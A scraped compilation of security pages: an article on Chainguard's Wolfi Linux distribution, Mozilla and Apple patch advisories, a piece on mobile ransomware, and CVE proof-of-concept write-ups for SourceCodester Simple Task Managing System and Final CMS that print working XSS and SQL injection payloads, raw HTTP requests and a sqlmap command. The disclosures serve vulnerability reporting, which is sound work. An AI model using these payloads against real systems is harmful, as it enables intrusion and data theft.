Security firm Chainguard has created a simple, open source way for organizations to defend the cloud against some of the most insidious attacks.

In the wake of alarming incidents like Russia’s massive 2017 NotPetya malware attack and the Kremlin’s 2020 SolarWinds cyberespionage campaign—both pulled off by poisoning wells for software distribution—organizations around the world have been scrambling to get a handle on software supply chain security. In general, and for open source software in particular, stronger defense rests in knowing what software you’re actually running, with a crucial focus on enumerating all the little pieces that make up the whole and validating that they are what they should be. That way, when you pack a box of software heirlooms and store it on a shelf, you know there isn’t a live microphone or a Tupperware full of deviled eggs sitting in the box for years. 

Creating a system to generate a manifest of what’s inside every box in every basement and garage is a massive effort, but a new tool from security firm Chainguard aims to do just that for the software "containers” that underly almost all digital services today.

On Thursday, Chainguard launched a Linux distribution called Wolfi that is designed specifically for how digital systems are actually built today in the cloud. Most consumers don’t use Linux, the famed open source operating system, on their personal computers. (If they do, they don’t necessarily know it, as is the case with Android, which is built on a modified version of Linux.) But the open source operating system is widely used in servers and cloud infrastructure around the world, partly because it can be deployed in such flexible ways. Unlike operating systems from Microsoft and Apple, where your only choice is whatever ice cream flavor they release, the open nature of Linux allows developers to create all sorts of flavors—known as “distributions”—to suit specific cravings and needs. But the developers at Chainguard, who have all been working in open source software for years, including on other Linux distributions, felt that a key flavor was missing.

“What we’ve done is built a distribution that we feel will work well for enterprises looking to seriously address supply chain security,” says Chainguard principal engineer Ariadne Conill. “Different distributions have different pieces of software that they include—they’re curated collections of software. By starting with a Linux distribution that gets everything right from the beginning, that’s a huge advantage for software developers to get their own stuff right.”

Think of software containers like a home built out of a shipping container. Everything you need to live is in there, but you can pick up the container house and move it wherever it needs to go. If an operating system is like the appliances, electrical wiring, plumbing, and other infrastructure in the container home, that’s what Wolfi is vetting and pre-itemizing to ensure the security of everything in your container house. Wolfi is designed to work smoothly with other tools from Chainguard that help developers build out and add to the software in their container in a secure way. In other words, it’s simple to validate furniture and personal effects and add them to your container home index. That way, if your house gets broken into, it’s easier to determine what happened and how. And if you ever want to ship your house overseas, you have a detailed manifest to show customs.

“It’s the exact same thing with software as with physical goods—there can be contraband or counterfeit goods that people are trying to hide and sneak by,” says Adolfo Garcia, a software engineer at Chainguard. “For software, if you don’t have the capability to collect the information at build time, you’re going to be missing a lot about what’s in there.”

In software supply chain security, and particularly in open source environments where there are generally fewer resources to invest in improvements, the stakes are high—and governments have started taking the problem seriously. In May 2021, the Biden administration issued an executive order that specifically addressed software supply chain security imperatives. And last week, the White House announced that the US Office of Management and Budget had issued specific supply chain security guidance to federal agencies.

“Not too long ago, the only real criteria for the quality of a piece of software was whether it worked as advertised. With the cyber threats facing Federal agencies, our technology must be developed in a way that makes it resilient and secure,” Chris DeRusha, the US federal chief information security officer and deputy national cyber director, wrote in the White House announcement. "This is not theoretical: Foreign governments and criminal syndicates are regularly seeking ways to compromise our digital infrastructure.”

When it comes to Wolfi, Santiago Torres-Arias, a software supply chain researcher at Purdue University, says that developers could accomplish some of the same protections with other Linux distributions, but that it’s a valuable step to see a release that’s been stripped down and purpose-built with supply chain security and validation in mind.

“There’s past work, including work done by people who are now at Chainguard, that was kind of the precursor of this train of thought that we need to remove the potentially vulnerable elements and list the software included in a particular container or Linux release,” Torres-Arias says. “Something like this is part of a constellation of software supply chain controls. And on a technical level, it’s a straightforward idea. But on a business level, in terms of getting organizations to adopt these practices, it could be very good.”

Both Torres-Arias and Chainguard’s CEO, Dan Lorenc, point out that generating a manifest—known in software supply chain security as a “software bill of materials,” or SBOM—doesn’t produce better security in itself. It’s how organizations act on the information that will really make the difference. But as with anything in security, a defense is only valuable and protective if it’s already in place before something goes awry.

“People have been struggling to make things work with distributions that previously existed and other workarounds,” Chainguard’s Conill says. “But they can have a piece of software, a dependency in there that they didn’t know was there until they find out the hard way. And, you know, suddenly it turns out that there was a little baggie of coke in that teddy bear in the container.”

A New Linux Tool Aims to Guard Against Supply Chain Attacks

Categories: Exploits and vulnerabilities
Categories: News
Tags: CVE-2022-40959

Tags:  CVE-2022-40960

Tags:  CVE-2022-40962

Tags:  CVE-2022-3033

Tags:  Mozilla

Tags:  Firefox

Tags:  Thunderbird

Mozilla has released security updates to address vulnerabilities in Firefox, Firefox ESR, and Thunderbird which could be exploited to take control of a system.



(Read more...)




The post Update Firefox and Thunderbird now! Mozilla patches several high risk vulnerabilities appeared first on Malwarebytes Labs.

Mozilla has released security updates to address vulnerabilities in Firefox, Firefox ESR, and Thunderbird. An attacker could exploit some of these vulnerabilities to take control of an affected system.

In Firefox 105 a total of seven vulnerabilities were patched, three of which received the security risk rating "high". In Thunderbird three security vulnerabilities were patched. One with the rating “high” risk.

Security advisories were published for Firefox 105, Firefox ESR 102.3, and Thunderbird 91.13.1. Firefox 105 is the browser most Mozilla users will have on their system. Firefox Extended Support Release (ESR) is an official version of Firefox developed for large organizations that need to set up and maintain Firefox on a large scale. Thunderbird is Mozilla’s free email application.

**How to update**

To find out which version you are using on a Windows machine, open the application menu and click on **Help > About**. On a Mac, look at the top menu and click **Firefox > About Firefox**. This will show which version you currently have and whether an update is available. On Android use the **My apps & games** item in the PlayStore side-menu and find **Firefox Browser** in the list. Use the **Update** button next to it.

_Downloading available update screen Firefox_

The screens and the way to access them are largely the same for all Mozilla programs, including Thunderbird.

Once you've updated, you're protected against these vulnerabilities.

Stay safe everyone!

**The technical details****Firefox vulnerabilities**

CVE-2022-40959: (High) Bypassing FeaturePolicy restrictions on transient pages. During iframe navigation, certain pages didn't have their FeaturePolicy fully initialized leading to a bypass that leaked device permissions into untrusted subdocuments. The HTTP Feature-Policy header provides a mechanism to allow and deny the use of browser features in its own frame, and in content within any iframe elements in the document.

CVE-2022-40960: (High) Data-race when parsing non-UTF-8 URLs in threads. Concurrent use of the URL parser with non-UTF-8 data was not thread-safe. This could lead to a use-after-free causing a potentially exploitable crash. UTF-8 is an encoding system for Unicode characters. It can translate any Unicode character into a matching unique binary string. A non-UTF-8 character is a sequence of bytes that is not a valid UTF-8 character. Since UTF-8 as character encoding was introduced in 2005, there may be still some URLs which use a different encoding. Or they could be constructed to exploit this vulnerability.

CVE-2022-40962: (High )Memory safety bugs fixed in Firefox 105 and Firefox ESR 102.3. These bugs were found by Mozilla developers and the Mozilla Fuzzing Team. Some of these bugs showed evidence of memory corruption and it is likely that with enough effort some of these could have been exploited to run arbitrary code.

CVE-2022-40958: (Moderate) Bypassing Secure Context restriction for cookies with \_\_Host and \_\_Secure prefix. By injecting a cookie with certain special characters, an attacker on a shared subdomain which is not a secure context could set and thus overwrite cookies from a secure context, leading to session fixation and other attacks. In a session fixation attack, the attacker already has access to a valid session and tries to force the victim to use that particular session for his or her own purposes. In such a case the attack is initiated before the user logs in and the session fixation attack fixes an established session on the victim's browser.

CVE-2022-40961: (Moderate) Stack-buffer overflow when initializing Graphics. During startup, a graphics driver with an unexpected name could lead to a stack-buffer overflow causing a potentially exploitable crash. This issue only affects Firefox for Android. Other operating systems are not affected.

CVE-2022-40956: (Low) Content-Security-Policy (CSP) base-uri bypass. When injecting an HTML base element, some requests would ignore the CSP's base-uri settings and accept the injected element's base instead. The HTTP CSP base-uri directive restricts the URLs which can be used in a document's <base> element.

CVE-2022-40957: (Low) Incoherent instruction cache when building WASM on ARM64. Inconsistent data in instruction and data cache when creating wasm code could lead to a potentially exploitable crash. Wasm is designed as a portable compilation target for programming languages, enabling deployment on the web for client and server applications. This bug only affects Firefox on ARM64 platforms. ARM64 is the architecture used by newer Macs built on Apple Silicon, shipped in late 2020 and beyond.

**Thunderbird**

CVE-2022-3033: (High) Leaking of sensitive information when composing a response to an HTML email with a META refresh tag. If a Thunderbird user replied to a crafted HTML email containing a meta tag, with the meta tag having the http-equiv="refresh" attribute, and the content attribute specifying an URL, then Thunderbird started a network request to that URL, regardless of the configuration to block remote content. In combination with certain other HTML elements and attributes in the email, it was possible to execute JavaScript code included in the message in the context of the message compose document. This bug doesn't affect Thunderbird users who have changed the default Message Body display setting to 'simple html' or 'plain text'.

CVE-2022-3032: (Moderate) When receiving an HTML email that contained an iframe element, which used a srcdoc attribute to define the inner HTML document, remote objects specified in the nested document, for example images or videos, were not blocked. Rather, the network was accessed, the objects were loaded and displayed.

CVE-2022-3034: (Moderate) An iframe element in an HTML email could trigger a network request. When receiving an HTML email that specified to load an iframe element from a remote location, a request to the remote document was sent. However, Thunderbird didn't display the document.

Update Firefox and Thunderbird now! Mozilla patches several high risk vulnerabilities

SourceCodester Simple Task Managing System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component newProjectValidation.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the fullName parameter.

**Simple Task Managing System - XSS2**

A vulnerability classified as problematic was found in SourceCodester Simple Task Managing System. This vulnerability affects unknown code. The manipulation of the argument newProjectValidation.php leads to cross site scripting. The attack can be initiated remotely.

username:admin password:admin ----> {ip}/newProjectValidation.php

Supplier： https://www.sourcecodester.com/php/15624/simple-task-managing-system-php-mysqli-free-source-code.html

/newProjectValidation.php has XSS

> Payload: "><ScRiPt>alert(1)</sCrIpT>

XSS because $full can be closed

**Payload**

GET http://localhost/cve/Task%20Managing%20System%20in%20PHP/newTask.php?sn\=%3CsCrIpT%3Ealert(1)%3C/sCrIpT%3E HTTP/1.1
Host: localhost
Cache\-Control: max\-age\=0
sec\-ch\-ua: ";Not A Brand";v\="99", "Chromium";v\="94"
sec\-ch\-ua\-mobile: ?0
sec\-ch\-ua\-platform: "Windows"
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=34a9idaoj7m7miduqt31hupisn
Connection: close

CVE-2022-40028: CVE_HUNTER/2022-09-01-XSS2.md at main · xidaner/CVE_HUNTER

SourceCodester Simple Task Managing System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component newTask.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the shortName parameter.

**Simple Task Managing System - XSS**

A vulnerability classified as problematic was found in SourceCodester Simple Task Managing System. This vulnerability affects unknown code. The manipulation of the argument newTask.php leads to cross site scripting. The attack can be initiated remotely.

username:admin password:admin ----> {ip}/newTask.php

Supplier： https://www.sourcecodester.com/php/15624/simple-task-managing-system-php-mysqli-free-source-code.html

/board.php has XSS

> Payload: "><ScRiPt>alert(1)</sCrIpT>

XSS because $shortName can be closed

**Payload**

GET http://localhost/cve/Task%20Managing%20System%20in%20PHP/newTask.php?sn\=%3CsCrIpT%3Ealert(1)%3C/sCrIpT%3E HTTP/1.1
Host: localhost
Cache\-Control: max\-age\=0
sec\-ch\-ua: ";Not A Brand";v\="99", "Chromium";v\="94"
sec\-ch\-ua\-mobile: ?0
sec\-ch\-ua\-platform: "Windows"
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=34a9idaoj7m7miduqt31hupisn
Connection: close

CVE-2022-40027: CVE_HUNTER/2022-09-01-XSS1.md at main · xidaner/CVE_HUNTER

SourceCodester Simple Task Managing System v1.0 was discovered to contain a SQL injection vulnerability via the bookId parameter at board.php.

**Simple Task Managing System - SQL injection**

Simple Task Managing System v1.0 exists to contain a SQL injection vulnerability via the bookId parameter at /board.php

username:admin password:admin ----> {ip}/board.php

Supplier： https://www.sourcecodester.com/php/15624/simple-task-managing-system-php-mysqli-free-source-code.html

/board.php has SQL injection

Payload: http://localhost:80/cve/Task Managing System in PHP/board.php?sn=admin1' AND ROW(6066,2526)>(SELECT COUNT(\*),CONCAT(0x7171787a71,(SELECT (ELT(6066=6066,1))),0x71787a6a71,FLOOR(RAND(0)\*2))x FROM (SELECT 5176 UNION SELECT 2058 UNION SELECT 2430 UNION SELECT 5444)a GROUP BY x) AND 'MkOa'='MkOa

SQL injection because $shortName can be closed

**Payload**

GET http://localhost:80/cve/Task Managing System in PHP/board.php?sn\=admin1' AND ROW(6066,2526)>(SELECT COUNT(\*),CONCAT(0x7171787a71,(SELECT (ELT(6066=6066,1))),0x71787a6a71,FLOOR(RAND(0)\*2))x FROM (SELECT 5176 UNION SELECT 2058 UNION SELECT 2430 UNION SELECT 5444)a GROUP BY x) AND 'MkOa'\='MkOa HTTP/1.1
Host: localhost
sec\-ch\-ua: ";Not A Brand";v\="99", "Chromium";v\="94"
sec\-ch\-ua\-mobile: ?0
sec\-ch\-ua\-platform: "Windows"
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=34a9idaoj7m7miduqt31hupisn
Connection: close

CVE-2022-40026: CVE_HUNTER/2022-09-01-SQL1.md at main · xidaner/CVE_HUNTER

Attacks against mobile phones and tablets are increasing, and a WannaCry-level attack could be on the horizon.

Enterprises worldwide are living dangerously, skating by with inadequate visibility and security into their mobile attack surface. While many organizations have adopted some level of management over the mobile devices connected to their systems, it's not the same as mobile security and leaves them unprepared for a growing threat. Attacks against mobile phones and tablets continue to increase, and chances are good that a devastating WannaCry\-level attack is just over the horizon.

The WannaCry ransomware attack caught the world unaware in 2017, infecting hundreds of thousands of computers in 150 countries worldwide. And it could have been worse had a British security research group not discovered a kill switch that stopped it from spreading within hours of the attack. But its impact was substantial nevertheless, crippling systems, causing several car manufacturers to stop production, and even forcing some hospitals in the UK to turn away patients. Damage was estimated to be in the billions of dollars.

By heeding the lessons of that attack, enterprises can now work to avoid a "mobile WannaCry" before it hits, rather than dealing with the damage after the fact. A mobile-based attack of that scale is possible, and its impact could be far worse because of the ubiquity and utility of mobile phones, along with the fact that almost everyone's device is vulnerable. As a US House Intelligence Committee recently heard, mobile spyware has even infected the phones of US diplomats worldwide.

**Devices Hold the Keys to the Kingdom — and They're Everywhere**

In the five years since WannaCry's appearance, mobile devices have become even more critical targets than laptops or desktop PCs. Smartphones are with us every minute of the day and are loaded with personal and organizational data. They hold passwords and email accounts, credit card and payment data, and biometric data often used in multifactor authentication (MFA) for logical and physical access. They also have microphones, cameras, and location data that can add to the risks if a device is compromised.

But as much as we depend on them, enterprises have not adequately addressed the mobile attack surface presented by these devices. Beyond changing the security mindset to include the mobile space, there are unique challenges that apply to mobile endpoints. Bring your own device (BYOD) is one of the biggest challenges to addressing an enterprise's mobile attack surface, due to the privacy needs and requirements regarding personally owned devices. Because of privacy concerns, standard products like mobile device management (MDM) are typically used only for corporate-managed devices and are often insufficient in detecting, reporting, and securing mobile devices against modern threats.

Mobile devices can present attackers with virtual keys to the kingdom if they are compromised and used to get past MFA. Email access is a prominent attack tool, but a mobile device also can provide access to accounting, finance, and customer relationship management tools such as Salesforce, Microsoft Office 365, or Google Workspace. And with these tools now available on personal devices, outside the scope and visibility of the security infrastructure, enterprises are putting their data and services at risk in the name of technological benefits like BYOD.

**Mobile Ransomware Would Have a Double Impact**

The risks of mobile ransomware essentially exist on two fronts.

*   **Mobile devices as a delivery mechanism for ransomware:** The compromising of a device, which can be accomplished with or without the owner's knowledge, could allow the sending of a ransomware-spreading email that appears to come from a trusted co-worker or source. Mobile devices can be used to spread traditional ransomware in ways that are very difficult to detect and stop.
*   **Actual mobile ransomware:** Early versions of mobile ransomware were somewhat faux ransomware, using overlays to take advantage of accessibility features. But Apple and Google effectively closed those holes, leading attackers toward actual mobile ransomware.

A mobile attack could lock not only an organization's data and systems, but a user's as well, threatening to wipe out their bank account, for instance, if a ransom is not paid. The attacker who took ownership of that device could leave its microphone and camera on at all times to bug corporate meetings.

The bottom line is mobile ransomware attacks could do everything WannaCry did, plus a lot more.

**The Time to Focus on Security Is Now**

A future large-scale and impactful ransomware attack against mobile is inevitable. Each year, we see mobile malware become more complex, with new features and capabilities introduced to impact the victim. These advancing malware techniques are only proofs of concepts for future attacks, laying the way for larger dangers to mobile endpoints. It is only a matter of time before malicious actors deliver complex mobile ransomware with a significant impact on users and enterprises.

Enterprises have not placed a high-enough priority on mobile security as devices have become indispensable in our personal and business lives. Mobile devices are ripe for an attack of WannaCry proportions, but whether that takes the form of ransomware or something else, the time to focus on mobile security is now, before it's too late.

Don't Wait for a Mobile WannaCry

The issue was addressed with improved bounds checks. This issue is fixed in macOS Monterey 12.6, iOS 15.7 and iPadOS 15.7, iOS 16, macOS Big Sur 11.7. An application may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited..

Released September 12, 2022

**ATS**

Available for: macOS Big Sur

Impact: An app may be able to bypass Privacy preferences

Description: A logic issue was addressed with improved state management.

CVE-2022-32902: Mickey Jin (@patch1t)

**Contacts**

Available for: macOS Big Sur

Impact: An app may be able to bypass Privacy preferences

Description: This issue was addressed with improved checks.

CVE-2022-32854: Holger Fuhrmannek of Deutsche Telekom Security

**iMovie**

Available for: macOS Big Sur

Impact: A user may be able to view sensitive user information

Description: This issue was addressed by enabling hardened runtime.

CVE-2022-32896: Wojciech Reguła (@\_r3ggi)

**Kernel**

Available for: macOS Big Sur

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-32911: Zweig of Kunlun Lab

**Kernel**

Available for: macOS Big Sur

Impact: An app may be able to disclose kernel memory

Description: The issue was addressed with improved memory handling.

CVE-2022-32864: Linus Henze of Pinauten GmbH (pinauten.de)

**Kernel**

Available for: macOS Big Sur

Impact: An application may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited.

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-32894: an anonymous researcher

**Kernel**

Available for: macOS Big Sur

Impact: An application may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited.

Description: The issue was addressed with improved bounds checks.

CVE-2022-32917: an anonymous researcher

**Maps**

Available for: macOS Big Sur

Impact: An app may be able to read sensitive location information

Description: A logic issue was addressed with improved restrictions.

CVE-2022-32883: Ron Masas, breakpointhq.com

**MediaLibrary**

Available for: macOS Big Sur

Impact: A user may be able to elevate privileges

Description: A memory corruption issue was addressed with improved input validation.

CVE-2022-32908: an anonymous researcher

**PackageKit**

Available for: macOS Big Sur

Impact: An app may be able to gain elevated privileges

Description: A logic issue was addressed with improved state management.

CVE-2022-32900: Mickey Jin (@patch1t)

CVE-2022-32917: About the security content of macOS Big Sur 11.7

A logic issue was addressed with improved restrictions. This issue is fixed in iOS 16, iOS 15.7 and iPadOS 15.7. A person with physical access to an iOS device may be able to access photos from the lock screen.

Released September 12, 2022

**Contacts**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to bypass Privacy preferences

Description: This issue was addressed with improved checks.

CVE-2022-32854: Holger Fuhrmannek of Deutsche Telekom Security

**Kernel**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-32911: Zweig of Kunlun Lab

**Kernel**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to disclose kernel memory

Description: The issue was addressed with improved memory handling.

CVE-2022-32864: Linus Henze of Pinauten GmbH (pinauten.de)

**Kernel**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An application may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited.

Description: The issue was addressed with improved bounds checks.

CVE-2022-32917: an anonymous researcher

**Maps**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to read sensitive location information

Description: A logic issue was addressed with improved restrictions.

CVE-2022-32883: Ron Masas, breakpointhq.com

**MediaLibrary**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A user may be able to elevate privileges

Description: A memory corruption issue was addressed with improved input validation.

CVE-2022-32908: an anonymous researcher

**Safari**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Visiting a malicious website may lead to address bar spoofing

Description: This issue was addressed with improved checks.

CVE-2022-32795: Narendra Bhati of Suma Soft Pvt. Ltd. Pune (India) @imnarendrabhati

**Safari Extensions**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A website may be able to track users through Safari web extensions

Description: A logic issue was addressed with improved state management.

WebKit Bugzilla: 242278  
CVE-2022-32868: Michael

**Shortcuts**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A person with physical access to an iOS device may be able to access photos from the lock screen

Description: A logic issue was addressed with improved restrictions.

CVE-2022-32872: Elite Tech Guru

**WebKit**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A buffer overflow issue was addressed with improved memory handling.

WebKit Bugzilla: 241969  
CVE-2022-32886: P1umer, afang5472, xmzyshypnc

**WebKit**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: An out-of-bounds read was addressed with improved bounds checking.

WebKit Bugzilla: 242762  
CVE-2022-32912: Jeonghoon Shin (@singi21a) at Theori working with Trend Micro Zero Day Initiative

CVE-2022-32872: About the security content of iOS 15.7 and iPadOS 15.7

An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Safari 16, iOS 16, iOS 15.7 and iPadOS 15.7. Processing maliciously crafted web content may lead to arbitrary code execution.

This document describes the security content of Safari 16.

**About Apple security updates**

For our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the Apple security updates page.

Apple security documents reference vulnerabilities by CVE-ID when possible.

For more information about security, see the Apple Product Security page.

**Safari 16**

Released September 12, 2022

**Safari Extensions**

Available for: macOS Big Sur and macOS Monterey

Impact: A website may be able to track users through Safari web extensions

Description: A logic issue was addressed with improved state management.

WebKit Bugzilla: 242278  
CVE-2022-32868: Michael

**WebKit**

Available for: macOS Big Sur and macOS Monterey

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A buffer overflow issue was addressed with improved memory handling.

WebKit Bugzilla: 241969  
CVE-2022-32886: P1umer, afang5472, xmzyshypnc

**WebKit**

Available for: macOS Big Sur and macOS Monterey

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: An out-of-bounds read was addressed with improved bounds checking.

WebKit Bugzilla: 242762  
CVE-2022-32912: Jeonghoon Shin (@singi21a) at Theori working with Trend Micro Zero Day Initiative

**WebKit**

Available for: macOS Big Sur and macOS Monterey

Impact: Visiting a website that frames malicious content may lead to UI spoofing

Description: The issue was addressed with improved UI handling.

WebKit Bugzilla: 243236  
CVE-2022-32891: @real\_as3617, an anonymous researcher

 

Information about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. Contact the vendor for additional information.

Published Date: September 12, 2022

CVE-2022-32912: About the security content of Safari 16

Final CMS 5.1.0 is vulnerable to SQL Injection.

Permalink

**POC**

First of all you should install sqlmap

you need set

*   target domain or IP
*   your cookie

the run the shell

    sqlmap -u http://targetDomainOrIP/jfinal_cms/admin/friendlylink/list  --thread 8 --batch --smart  --random-agent --data "form.orderColumn=url*&form.orderAsc=asc&attr.name=&totalRecords=10&pageNo=1&pageSize=20&length=10"  --cookie "  your cookie  " --current-db
    

Sometimes you should know that the /jfinal\_cms/ is not necessary ,you need juede the route

**principle**

you can see the code of interface /system/menu/list

    sql.append(" order by ").append(orderBy);
    

There is a sql statement directly spliced

what is more

There is no measure to prevent sql injection because sql injection is required here

**solution**

By analyzing this function point, I found that the injection of orderby is fixed, such as id, name, menu key, so you can try to use parameterized query or make a whitelist

**TEST**

    POST /jfinal_cms/admin/friendlylink/list HTTP/1.1
    Host: 172.30.48.1
    Content-Length: 96
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://172.30.48.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://172.30.48.1/jfinal_cms/admin/friendlylink/list
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: JSESSIONID=BF13B42EDFC3DEC180959D6DF143BD18; Hm_lvt_1040d081eea13b44d84a4af639640d51=1659122360; session_user="wgPmpe3hEuJWIL+I+kHtxqag1wutWsMhm6eaAgoJH0c="
    Connection: close
    
    form.orderColumn=url*&form.orderAsc=asc&attr.name=&totalRecords=10&pageNo=1&pageSize=20&length=10

Tag

#apple